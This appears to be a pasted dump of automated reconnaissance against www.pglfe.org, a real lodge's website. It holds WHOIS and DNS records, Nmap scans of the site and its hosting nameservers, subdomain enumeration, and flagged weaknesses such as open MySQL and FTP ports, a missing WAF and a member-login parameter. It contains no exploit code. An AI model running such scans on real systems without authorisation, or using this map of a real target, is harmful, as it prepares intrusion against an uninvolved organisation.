· 6 years ago · Nov 25, 2019, 02:48 PM
1#######################################################################################################################################
2======================================================================================================================================
3Hostname www.pglfe.org ISP CenturyLink Communications, LLC
4Continent North America Flag
5US
6Country United States Country Code US
7Region Massachusetts Local time 25 Nov 2019 07:39 EST
8City Waltham Postal Code 02451
9IP Address 192.252.144.58 Latitude 42.397
10 Longitude -71.243
11=======================================================================================================================================
12#######################################################################################################################################
13> www.pglfe.org
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.pglfe.org
19Address: 192.252.144.58
20>
21#######################################################################################################################################
22Domain Name: PGLFE.ORG
23Registry Domain ID: D124888109-LROR
24Registrar WHOIS Server: whois.godaddy.com
25Registrar URL: http://www.whois.godaddy.com
26Updated Date: 2017-02-14T08:11:42Z
27Creation Date: 2006-06-22T00:09:56Z
28Registry Expiry Date: 2022-06-22T00:09:56Z
29Registrar Registration Expiration Date:
30Registrar: GoDaddy.com, LLC
31Registrar IANA ID: 146
32Registrar Abuse Contact Email: abuse@godaddy.com
33Registrar Abuse Contact Phone: +1.4806242505
34Reseller:
35Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
36Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
37Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
38Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
39Registrant Organization: The Provincial Grand Lodge of the Far East
40Registrant State/Province:
41Registrant Country: HK
42Name Server: NS1.SERVER279.COM
43Name Server: NS2.SERVER279.COM
44DNSSEC: unsigned
45#######################################################################################################################################
46[+] Target : www.pglfe.org
47
48[+] IP Address : 192.252.144.58
49
50[+] Headers :
51
52[+] Date : Mon, 25 Nov 2019 12:44:29 GMT
53[+] Server : Apache
54[+] Expires : Thu, 19 Nov 1981 08:52:00 GMT
55[+] Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
56[+] Pragma : no-cache
57[+] Set-Cookie : pglfesesid=8a728b7630c4b963ff6ccadf5caa3f5c; path=/
58[+] Upgrade : h2
59[+] Connection : Upgrade, Keep-Alive
60[+] Keep-Alive : timeout=5, max=100
61[+] Transfer-Encoding : chunked
62[+] Content-Type : text/html
63
64[+] SSL Certificate Information :
65
66[+] commonName : catchall-server-default.server279.com
67[+] countryName : US
68[+] organizationName : Let's Encrypt
69[+] commonName : Let's Encrypt Authority X3
70[+] Version : 3
71[+] Serial Number : 03E1E2F2569563636C9E9DB9B2F3D0A012F8
72[+] Not Before : Sep 22 05:35:30 2019 GMT
73[+] Not After : Dec 21 05:35:30 2019 GMT
74[+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
75[+] subject Alt Name : (('DNS', 'catchall-server-default.server279.com'),)
76[+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)
77
78[+] Whois Lookup :
79
80[+] NIR : None
81[+] ASN Registry : arin
82[+] ASN : 3561
83[+] ASN CIDR : 192.252.144.0/20
84[+] ASN Country Code : US
85[+] ASN Date : 2013-06-27
86[+] ASN Description : CENTURYLINK-LEGACY-SAVVIS - CenturyLink Communications, LLC, US
87[+] cidr : 192.252.144.0/20
88[+] name : SURESUPPORT-LLC
89[+] handle : NET-192-252-144-0-1
90[+] range : 192.252.144.0 - 192.252.159.255
91[+] description : SureSupport LLC
92[+] country : US
93[+] state : MA
94[+] city : Waltham
95[+] address : SAVVIS
96600 Winter St.
97[+] postal_code : 02451
98[+] emails : ['abuse@suresupport.com', 'admin@suresupport.com']
99[+] created : 2013-06-27
100[+] updated : 2013-08-06
101
102[+] Crawling Target...
103
104[+] Looking for robots.txt........[ Not Found ]
105[+] Looking for sitemap.xml.......[ Not Found ]
106[+] Extracting CSS Links..........[ 11 ]
107[+] Extracting Javascript Links...[ 21 ]
108[+] Extracting Internal Links.....[ 1 ]
109[+] Extracting External Links.....[ 4 ]
110[+] Extracting Images.............[ 38 ]
111
112[+] Total Links Extracted : 75
113
114[+] Dumping Links in /opt/FinalRecon/dumps/www.pglfe.org.dump
115[+] Completed!
116#######################################################################################################################################
117[i] Scanning Site: http://www.pglfe.org
118
119
120
121B A S I C I N F O
122====================
123
124
125[+] Site Title: Provincial Grand Lodge of the Far East
126[+] IP address: 192.252.144.58
127[+] Web Server: Apache
128[+] CMS: Could Not Detect
129[+] Cloudflare: Not Detected
130[+] Robots File: Could NOT Find robots.txt!
131
132
133
134
165
166
167
168
169
170G E O I P L O O K U P
171=========================
172
173[i] IP Address: 192.252.144.58
174[i] Country: United States
175[i] State: Massachusetts
176[i] City: Waltham
177[i] Latitude: 42.3986
178[i] Longitude: -71.2451
179
180
181
182
183H T T P H E A D E R S
184=======================
185
186
187
188
189
190
191D N S L O O K U P
192===================
193
194pglfe.org. 2559 IN SOA ns1.server279.com. hostmaster.pglfe.org. 1574672517 16384 2048 1048576 2560
195pglfe.org. 21599 IN NS ns1.server279.com.
196pglfe.org. 21599 IN NS ns2.server279.com.
197pglfe.org. 14399 IN MX 0 mail.pglfe.org.
198pglfe.org. 14399 IN TXT "v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
199pglfe.org. 14399 IN A 192.252.144.58
200
201
202
203
204S U B N E T C A L C U L A T I O N
205====================================
206
207Address = 192.252.144.58
208Network = 192.252.144.58 / 32
209Netmask = 255.255.255.255
210Broadcast = not needed on Point-to-Point links
211Wildcard Mask = 0.0.0.0
212Hosts Bits = 0
213Max. Hosts = 1 (2^0 - 0)
214Host Range = { 192.252.144.58 - 192.252.144.58 }
215
216
217
218N M A P P O R T S C A N
219============================
220
221Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-25 12:45 UTC
222Nmap scan report for pglfe.org (192.252.144.58)
223Host is up (0.027s latency).
224
225PORT STATE SERVICE
22621/tcp open ftp
22722/tcp open ssh
22823/tcp filtered telnet
22980/tcp open http
230110/tcp open pop3
231143/tcp open imap
232443/tcp open https
2333389/tcp filtered ms-wbt-server
234
235Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
236
237
238
239S U B - D O M A I N F I N D E R
240==================================
241
242
243[i] Total Subdomains Found : 3
244
245[+] Subdomain: mta-sts.mail.pglfe.org
246[-] IP: 192.252.144.58
247
248[+] Subdomain: hostmaster.pglfe.org
249[-] IP: 192.252.144.58
250
251[+] Subdomain: www.pglfe.org
252[-] IP: 192.252.144.58
253######################################################################################################################################
254[+] Starting At 2019-11-25 07:44:45.942326
255[+] Collecting Information On: http://www.pglfe.org/
256[#] Status: 200
257--------------------------------------------------
258[#] Web Server Detected: Apache
259[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
260- Date: Mon, 25 Nov 2019 12:44:46 GMT
261- Server: Apache
262- Expires: Thu, 19 Nov 1981 08:52:00 GMT
263- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
264- Pragma: no-cache
265- Set-Cookie: pglfesesid=7d78633488a6818af17a1a6e85e3fc93; path=/
266- Upgrade: h2
267- Connection: Upgrade, Keep-Alive
268- Keep-Alive: timeout=5, max=100
269- Transfer-Encoding: chunked
270- Content-Type: text/html
271--------------------------------------------------
272[#] Finding Location..!
273[#] status: success
274[#] country: United States
275[#] countryCode: US
276[#] region: MA
277[#] regionName: Massachusetts
278[#] city: Waltham
279[#] zip: 02451
280[#] lat: 42.3972
281[#] lon: -71.2677
282[#] timezone: America/New_York
283[#] isp: CenturyLink Communications, LLC
284[#] org: SureSupport LLC
285[#] as: AS3561 CenturyLink Communications, LLC
286[#] query: 192.252.144.58
287--------------------------------------------------
288[x] Didn't Detect WAF Presence on: http://www.pglfe.org/
289--------------------------------------------------
290[#] Starting Reverse DNS
291[-] Failed ! Fail
292--------------------------------------------------
293[!] Scanning Open Port
294[#] 21/tcp open ftp
295[#] 22/tcp open ssh
296[#] 80/tcp open http
297[#] 110/tcp open pop3
298[#] 143/tcp open imap
299[#] 443/tcp open https
300[#] 587/tcp open submission
301[#] 993/tcp open imaps
302[#] 995/tcp open pop3s
303[#] 3306/tcp open mysql
304--------------------------------------------------
305[+] Collecting Information Disclosure!
306[#] Detecting sitemap.xml file
307[-] sitemap.xml file not Found!?
308[#] Detecting robots.txt file
309[-] robots.txt file not Found!?
310[#] Detecting GNU Mailman
311[-] GNU Mailman App Not Detected!?
312--------------------------------------------------
313[+] Crawling Url Parameter On: http://www.pglfe.org/
314--------------------------------------------------
315[#] Searching Html Form !
316[-] No Html Form Found!?
317--------------------------------------------------
318[!] Found 3 dom parameter
319[#] http://www.pglfe.org//#
320[#] http://www.pglfe.org//#
321[#] http://www.pglfe.org//#
322--------------------------------------------------
323[!] 1 Internal Dynamic Parameter Discovered
324[+] http://www.pglfe.org///members/member_login.php?to_page=photos
325--------------------------------------------------
326[-] No external Dynamic Paramter Found!?
327--------------------------------------------------
328[!] 92 Internal links Discovered
421--------------------------------------------------
422[!] 4 External links Discovered
423[#] http://zetlandhall.com
424[#] http://www.freemason.ie
425[#] http://freemason.ie/about-grand-lodge/appendant-bodies/supreme-grand-royal-arch-chapter-of-ireland/
426[#] http://www.knight-masons.com
427--------------------------------------------------
428[#] Mapping Subdomain..
429[!] Found 4 Subdomain
430- mail.pglfe.org
431- mta-sts.mail.pglfe.org
432- hostmaster.pglfe.org
433- www.pglfe.org
434--------------------------------------------------
435[!] Done At 2019-11-25 07:56:21.242286
436#######################################################################################################################################
437[INFO] ------TARGET info------
438[*] TARGET: http://www.pglfe.org/
439[*] TARGET IP: 192.252.144.58
440[INFO] NO load balancer detected for www.pglfe.org...
441[*] DNS servers: ns1.server279.com.
442[*] TARGET server:
443[*] CC: US
444[*] Country: United States
445[*] RegionCode: MA
446[*] RegionName: Massachusetts
447[*] City: Waltham
448[*] ASN: AS3561
449[*] BGP_PREFIX: 192.252.144.0/20
450[*] ISP: CENTURYLINK-LEGACY-SAVVIS - CenturyLink Communications, LLC, US
451[INFO] DNS enumeration:
523[INFO] Possible abuse mails are:
524[*] abuse@pglfe.org
525[*] abuse@suresupport.com
526[*] abuse@www.pglfe.org
527[INFO] NO PAC (Proxy Auto Configuration) file FOUND
528[INFO] Starting FUZZing in http://www.pglfe.org/FUzZzZzZzZz...
529[INFO] Status code Folders
530[ALERT] Look in the source code. It may contain passwords
531
532Recherche www.pglfe.org
533Connexion HTTP à www.pglfe.org
534Alerte ! : Impossible d’établir une connexion à l’hôte distant.
535
536lynx : accès impossible au fichier de départ http://www.pglfe.org/
537[INFO] Links found from http://www.pglfe.org/ http://192.252.144.58/:
538cut: intervalle de champ incorrecte
539Saisissez « cut --help » pour plus d'informations.
540[INFO] Shodan detected the following opened ports on 192.252.144.58:
541[*] 0
542[*] 1
543[*] 110
544[*] 21
545[*] 214
546[*] 22
547[*] 3
548[*] 4
549[*] 443
550[*] 587
551[*] 8
552[*] 80
553[*] 993
554[*] 995
555[INFO] ------VirusTotal SECTION------
556[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
557[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
558[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
559[INFO] ------Alexa Rank SECTION------
560[INFO] Percent of Visitors Rank in Country:
561[INFO] Percent of Search Traffic:
562[INFO] Percent of Unique Visits:
563[INFO] Total Sites Linking In:
564[*] Total Sites
565[INFO] Useful links related to www.pglfe.org - 192.252.144.58:
566[*] https://www.virustotal.com/pt/ip-address/192.252.144.58/information/
567[*] https://www.hybrid-analysis.com/search?host=192.252.144.58
568[*] https://www.shodan.io/host/192.252.144.58
569[*] https://www.senderbase.org/lookup/?search_string=192.252.144.58
570[*] https://www.alienvault.com/open-threat-exchange/ip/192.252.144.58
571[*] http://pastebin.com/search?q=192.252.144.58
572[*] http://urlquery.net/search.php?q=192.252.144.58
573[*] http://www.alexa.com/siteinfo/www.pglfe.org
574[*] http://www.google.com/safebrowsing/diagnostic?site=www.pglfe.org
575[*] https://censys.io/ipv4/192.252.144.58
576[*] https://www.abuseipdb.com/check/192.252.144.58
577[*] https://urlscan.io/search/#192.252.144.58
578[*] https://github.com/search?q=192.252.144.58&type=Code
579[INFO] Useful links related to AS3561 - 192.252.144.0/20:
580[*] http://www.google.com/safebrowsing/diagnostic?site=AS:3561
581[*] https://www.senderbase.org/lookup/?search_string=192.252.144.0/20
582[*] http://bgp.he.net/AS3561
583[*] https://stat.ripe.net/AS3561
584[INFO] Date: 25/11/19 | Time: 07:51:49
585[INFO] Total time: 7 minute(s) and 0 second(s)
586#######################################################################################################################################
587Trying "pglfe.org"
588;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41004
589;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 2, ADDITIONAL: 2
590
591;; QUESTION SECTION:
592;pglfe.org. IN ANY
593
594;; ANSWER SECTION:
595pglfe.org. 0 IN A 192.252.144.58
596pglfe.org. 0 IN TXT "v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
597pglfe.org. 0 IN MX 0 mail.pglfe.org.
598pglfe.org. 0 IN SOA ns1.server279.com. hostmaster.pglfe.org. 1574672517 16384 2048 1048576 2560
599pglfe.org. 0 IN NS ns2.server279.com.
600pglfe.org. 0 IN NS ns1.server279.com.
601
602;; AUTHORITY SECTION:
603pglfe.org. 25920 IN NS ns2.server279.com.
604pglfe.org. 25920 IN NS ns1.server279.com.
605
606;; ADDITIONAL SECTION:
607ns1.server279.com. 8294 IN A 192.252.144.29
608ns2.server279.com. 8294 IN A 192.252.145.29
609
610Received 291 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 86 ms
611#######################################################################################################################################
612; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace pglfe.org any
613;; global options: +cmd
614. 84082 IN NS b.root-servers.net.
615. 84082 IN NS c.root-servers.net.
616. 84082 IN NS k.root-servers.net.
617. 84082 IN NS d.root-servers.net.
618. 84082 IN NS h.root-servers.net.
619. 84082 IN NS e.root-servers.net.
620. 84082 IN NS f.root-servers.net.
621. 84082 IN NS g.root-servers.net.
622. 84082 IN NS m.root-servers.net.
623. 84082 IN NS a.root-servers.net.
624. 84082 IN NS i.root-servers.net.
625. 84082 IN NS l.root-servers.net.
626. 84082 IN NS j.root-servers.net.
628;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 170 ms
629
630org. 172800 IN NS b2.org.afilias-nst.org.
631org. 172800 IN NS c0.org.afilias-nst.info.
632org. 172800 IN NS d0.org.afilias-nst.org.
633org. 172800 IN NS b0.org.afilias-nst.org.
634org. 172800 IN NS a2.org.afilias-nst.info.
635org. 172800 IN NS a0.org.afilias-nst.info.
639;; Received 839 bytes from 2001:500:200::b#53(b.root-servers.net) in 77 ms
640
641pglfe.org. 86400 IN NS ns2.server279.com.
642pglfe.org. 86400 IN NS ns1.server279.com.
647;; Received 580 bytes from 199.19.56.1#53(a0.org.afilias-nst.info) in 274 ms
648
649;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
650;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
651;; connection timed out; no servers could be reached
652;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
653#######################################################################################################################################
654[*] Performing General Enumeration of Domain: pglfe.org
655[!] Wildcard resolution is enabled on this domain
656[!] It is resolving to 192.252.144.58
657[!] All queries will resolve to this address!!
658[-] DNSSEC is not configured for pglfe.org
659[*] SOA ns1.server279.com 192.252.144.29
660[*] NS ns2.server279.com 192.252.145.29
661[*] NS ns1.server279.com 192.252.144.29
662[*] MX mail.pglfe.org 192.252.144.58
663[*] A pglfe.org 192.252.144.58
664[*] TXT pglfe.org v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all
665[*] Enumerating SRV Records
666[-] No SRV Records Found for pglfe.org
667[+] 0 Records Found
668#######################################################################################################################################
669[*] Processing domain pglfe.org
670[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
671[+] Getting nameservers
672192.252.145.29 - ns2.server279.com
673192.252.144.29 - ns1.server279.com
674[-] Zone transfer failed
675
676[+] TXT records found
677"v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
678
679[+] MX records found, added to target list
6800 mail.pglfe.org.
681
682[+] Wildcard domain found - 192.252.144.58
683[*] Scanning pglfe.org for A records
684#######################################################################################################################################
685Domains still to check: 1
686 Checking if the hostname pglfe.org. given is in fact a domain...
687
688Analyzing domain: pglfe.org.
689 Checking NameServers using system default resolver...
690 IP: 192.252.145.29 (United States)
691 HostName: ns2.server279.com Type: NS
692 HostName: ns2.server279.com Type: PTR
693 IP: 192.252.144.29 (United States)
694 HostName: ns1.server279.com Type: NS
695 HostName: server279.com Type: PTR
696
697 Checking MailServers using system default resolver...
698 IP: 192.252.144.58 (United States)
699 HostName: mail.pglfe.org Type: MX
700 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
701
702 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
703 No zone transfer found on nameserver 192.252.144.29
704 No zone transfer found on nameserver 192.252.145.29
705
706 Checking SPF record...
707
708 Checking SPF record...
709
710 Checking SPF record...
711 No SPF record
712
713 Checking 1 most common hostnames using system default resolver...
714 IP: 192.252.144.58 (United States)
715 HostName: mail.pglfe.org Type: MX
716 HostName: www.pglfe.org. Type: A
717
718 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
719 Checking netblock 192.252.144.0
720 Checking netblock 192.252.145.0
721
722 Searching for pglfe.org. emails in Google
723 pglsec@pglfe.org)
724
725 Checking 3 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
726 Host 192.252.144.29 is up (reset ttl 64)
727 Host 192.252.145.29 is up (reset ttl 64)
728 Host 192.252.144.58 is up (reset ttl 64)
729
730 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
731 Scanning ip 192.252.144.29 (server279.com (PTR)):
732 21/tcp open ftp syn-ack ttl 48 ProFTPD
733 22/tcp open tcpwrapped syn-ack ttl 48
734 |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
735 53/tcp open tcpwrapped syn-ack ttl 48
736 80/tcp open tcpwrapped syn-ack ttl 48
737 110/tcp open tcpwrapped syn-ack ttl 48
738 143/tcp open tcpwrapped syn-ack ttl 48
739 |_imap-capabilities: capabilities post-login more IMAP4rev1 have ENABLE Pre-login listed SASL-IR OK ID AUTH=PLAINA0001 IDLE STARTTLS LOGIN-REFERRALS LITERAL+
740 443/tcp open tcpwrapped syn-ack ttl 48
741 | ssl-cert: Subject: commonName=catchall-server-default.server279.com
742 | Subject Alternative Name: DNS:catchall-server-default.server279.com
743 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
744 | Public Key type: rsa
745 | Public Key bits: 2048
746 | Signature Algorithm: sha256WithRSAEncryption
747 | Not valid before: 2019-09-22T05:35:30
748 | Not valid after: 2019-12-21T05:35:30
749 | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
750 |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
751 465/tcp open tcpwrapped syn-ack ttl 48
752 |_smtp-commands: Couldn't establish connection on port 465
753 | ssl-cert: Subject: commonName=ssl.server279.com
754 | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
755 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
756 | Public Key type: rsa
757 | Public Key bits: 2048
758 | Signature Algorithm: sha256WithRSAEncryption
759 | Not valid before: 2019-09-22T05:35:22
760 | Not valid after: 2019-12-21T05:35:22
761 | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
762 |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
763 587/tcp open tcpwrapped syn-ack ttl 48
764 | smtp-commands: server279.com, STARTTLS, PIPELINING, 8BITMIME, SIZE 0, AUTH LOGIN PLAIN CRAM-MD5,
765 |_ netqmail home page: http://qmail.org/netqmail
766 993/tcp open tcpwrapped syn-ack ttl 48
767 995/tcp open tcpwrapped syn-ack ttl 48
768 3306/tcp open tcpwrapped syn-ack ttl 48
769 OS Info: Service Info: Host: 192.252.144.29; OS: Unix
770 Scanning ip 192.252.145.29 (ns2.server279.com (PTR)):
771 21/tcp open tcpwrapped syn-ack ttl 48
772 53/tcp open tcpwrapped syn-ack ttl 48
773 80/tcp open tcpwrapped syn-ack ttl 48
774 110/tcp open tcpwrapped syn-ack ttl 48
775 143/tcp open tcpwrapped syn-ack ttl 48
776 443/tcp open tcpwrapped syn-ack ttl 48
777 465/tcp open tcpwrapped syn-ack ttl 48
778 |_smtp-commands: Couldn't establish connection on port 465
779 | ssl-cert: Subject: commonName=ssl.server279.com
780 | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
781 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
782 | Public Key type: rsa
783 | Public Key bits: 2048
784 | Signature Algorithm: sha256WithRSAEncryption
785 | Not valid before: 2019-09-22T05:35:22
786 | Not valid after: 2019-12-21T05:35:22
787 | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
788 |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
789 587/tcp open tcpwrapped syn-ack ttl 48
790 |_smtp-commands: Couldn't establish connection on port 587
791 993/tcp open tcpwrapped syn-ack ttl 48
792 995/tcp open tcpwrapped syn-ack ttl 48
793 3306/tcp open tcpwrapped syn-ack ttl 48
794 Scanning ip 192.252.144.58 (www.pglfe.org.):
795 21/tcp open tcpwrapped syn-ack ttl 48
796 80/tcp open tcpwrapped syn-ack ttl 48
797 110/tcp open tcpwrapped syn-ack ttl 48
798 143/tcp open tcpwrapped syn-ack ttl 48
799 443/tcp open tcpwrapped syn-ack ttl 48
800 | http-methods:
801 |_ Supported Methods: OPTIONS
802 | ssl-cert: Subject: commonName=catchall-server-default.server279.com
803 | Subject Alternative Name: DNS:catchall-server-default.server279.com
804 | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
805 | Public Key type: rsa
806 | Public Key bits: 2048
807 | Signature Algorithm: sha256WithRSAEncryption
808 | Not valid before: 2019-09-22T05:35:30
809 | Not valid after: 2019-12-21T05:35:30
810 | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
811 |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
812 587/tcp open tcpwrapped syn-ack ttl 48
813 |_smtp-commands: Couldn't establish connection on port 587
814 993/tcp open tcpwrapped syn-ack ttl 48
815 995/tcp open tcpwrapped syn-ack ttl 48
816 3306/tcp open tcpwrapped syn-ack ttl 48
817 WebCrawling domain's web servers... up to 50 max links.
818--Finished--
819Summary information for domain pglfe.org.
820-----------------------------------------
821 Domain Specific Information:
822 Email: pglsec@pglfe.org)
823
824 Domain Ips Information:
825 IP: 192.252.144.29
826 HostName: ns1.server279.com Type: NS
827 HostName: server279.com Type: PTR
828 Country: United States
829 Is Active: True (reset ttl 64)
830 Port: 21/tcp open ftp syn-ack ttl 48 ProFTPD
831 Port: 22/tcp open tcpwrapped syn-ack ttl 48
832 Script Info: |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
833 Port: 53/tcp open tcpwrapped syn-ack ttl 48
834 Port: 80/tcp open tcpwrapped syn-ack ttl 48
835 Port: 110/tcp open tcpwrapped syn-ack ttl 48
836 Port: 143/tcp open tcpwrapped syn-ack ttl 48
837 Script Info: |_imap-capabilities: capabilities post-login more IMAP4rev1 have ENABLE Pre-login listed SASL-IR OK ID AUTH=PLAINA0001 IDLE STARTTLS LOGIN-REFERRALS LITERAL+
838 Port: 443/tcp open tcpwrapped syn-ack ttl 48
839 Script Info: | ssl-cert: Subject: commonName=catchall-server-default.server279.com
840 Script Info: | Subject Alternative Name: DNS:catchall-server-default.server279.com
841 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
842 Script Info: | Public Key type: rsa
843 Script Info: | Public Key bits: 2048
844 Script Info: | Signature Algorithm: sha256WithRSAEncryption
845 Script Info: | Not valid before: 2019-09-22T05:35:30
846 Script Info: | Not valid after: 2019-12-21T05:35:30
847 Script Info: | MD5: 86ba 32ce 10d9 9b41 24c6 d62e b4cf 9165
848 Script Info: |_SHA-1: c361 8d67 90d9 a186 8f9e 0c29 5409 e82b 9257 38a2
849 Port: 465/tcp open tcpwrapped syn-ack ttl 48
850 Script Info: |_smtp-commands: Couldn't establish connection on port 465
851 Script Info: | ssl-cert: Subject: commonName=ssl.server279.com
852 Script Info: | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
853 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
854 Script Info: | Public Key type: rsa
855 Script Info: | Public Key bits: 2048
856 Script Info: | Signature Algorithm: sha256WithRSAEncryption
857 Script Info: | Not valid before: 2019-09-22T05:35:22
858 Script Info: | Not valid after: 2019-12-21T05:35:22
859 Script Info: | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
860 Script Info: |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
861 Port: 587/tcp open tcpwrapped syn-ack ttl 48
862 Script Info: | smtp-commands: server279.com, STARTTLS, PIPELINING, 8BITMIME, SIZE 0, AUTH LOGIN PLAIN CRAM-MD5,
863 Script Info: |_ netqmail home page: http://qmail.org/netqmail
864 Port: 993/tcp open tcpwrapped syn-ack ttl 48
865 Port: 995/tcp open tcpwrapped syn-ack ttl 48
866 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
867 Os Info: Host: 192.252.144.29; OS: Unix
868 IP: 192.252.145.29
869 HostName: ns2.server279.com Type: NS
870 HostName: ns2.server279.com Type: PTR
871 Country: United States
872 Is Active: True (reset ttl 64)
873 Port: 21/tcp open tcpwrapped syn-ack ttl 48
874 Port: 53/tcp open tcpwrapped syn-ack ttl 48
875 Port: 80/tcp open tcpwrapped syn-ack ttl 48
876 Port: 110/tcp open tcpwrapped syn-ack ttl 48
877 Port: 143/tcp open tcpwrapped syn-ack ttl 48
878 Port: 443/tcp open tcpwrapped syn-ack ttl 48
879 Port: 465/tcp open tcpwrapped syn-ack ttl 48
880 Script Info: |_smtp-commands: Couldn't establish connection on port 465
881 Script Info: | ssl-cert: Subject: commonName=ssl.server279.com
882 Script Info: | Subject Alternative Name: DNS:db.server279.com, DNS:dns.server279.com, DNS:ftp.server279.com, DNS:imap.server279.com, DNS:imap4.server279.com, DNS:incoming.server279.com, DNS:mail.server279.com, DNS:mbox.server279.com, DNS:mysql.server279.com, DNS:mysql4.server279.com, DNS:mysql5.server279.com, DNS:ns.server279.com, DNS:outgoing.server279.com, DNS:pop.server279.com, DNS:pop3.server279.com, DNS:server279.com, DNS:smtp.server279.com, DNS:ssl.server279.com, DNS:webmail.server279.com, DNS:www.server279.com
883 Script Info: | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
884 Script Info: | Public Key type: rsa
885 Script Info: | Public Key bits: 2048
886 Script Info: | Signature Algorithm: sha256WithRSAEncryption
887 Script Info: | Not valid before: 2019-09-22T05:35:22
888 Script Info: | Not valid after: 2019-12-21T05:35:22
889 Script Info: | MD5: b8a9 a1d2 e5be ed2b 42c2 f0d0 ec08 94d4
890 Script Info: |_SHA-1: 7a72 c0c7 92a5 4bb9 882d 0150 f43c c9cf 23be 1e30
891 Port: 587/tcp open tcpwrapped syn-ack ttl 48
892 Script Info: |_smtp-commands: Couldn't establish connection on port 587
893 Port: 993/tcp open tcpwrapped syn-ack ttl 48
894 Port: 995/tcp open tcpwrapped syn-ack ttl 48
895 Port: 3306/tcp open tcpwrapped syn-ack ttl 48
896 IP: 192.252.144.58
897 HostName: mail.pglfe.org Type: MX
898 HostName: www.pglfe.org. Type: A
899 Country: United States
